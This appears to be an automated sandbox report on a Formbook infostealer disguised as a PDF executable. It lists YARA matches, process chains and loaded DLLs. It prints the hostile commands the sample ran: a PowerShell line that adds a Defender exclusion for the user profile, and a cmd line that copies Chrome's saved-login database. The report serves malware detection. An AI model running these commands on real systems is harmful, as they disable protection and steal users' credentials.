Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 6512, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: calc.exe PID: 2300, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 6272, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmmon32.exe PID: 5376, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: wmplayer.exe PID: 6672, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: raserver.exe PID: 1088, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1068/19@14/1
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Code function: 0_2_00007FF7D7862060 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma, 0_2_00007FF7D7862060
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe File created: C:\Users\user\101 2043 5770 pdf.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lxxqwri.2qj.ps1
Source: 101 2043 5770 pdf.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 45.39%
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ipconfig.exe, 00000009.00000003.2325922951.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4579575870.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000003.2216446501.000000000273B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2216846403.00000000026A5000.00000004.00001000.00020000.00000000.sdmp, DB1.11.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 101 2043 5770 pdf.exe ReversingLabs: Detection: 31%
Source: 101 2043 5770 pdf.exe Virustotal: Detection: 16%
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe File read: C:\Users\user\Desktop\101 2043 5770 pdf.exe
Source: unknown Process created: C:\Users\user\Desktop\101 2043 5770 pdf.exe "C:\Users\user\Desktop\101 2043 5770 pdf.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\explorer.exe Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\101 2043 5770 pdf.exe "C:\Users\user\101 2043 5770 pdf.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: icu.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.shell.broker.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: apphelp.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: icu.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: propsys.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: edputil.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: urlmon.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: srvcli.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: netutils.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: appresolver.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: slc.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: sppc.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: version.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: icu.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: propsys.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: edputil.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: urlmon.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: srvcli.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: netutils.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: appresolver.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: slc.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: sppc.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\101 2043 5770 pdf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
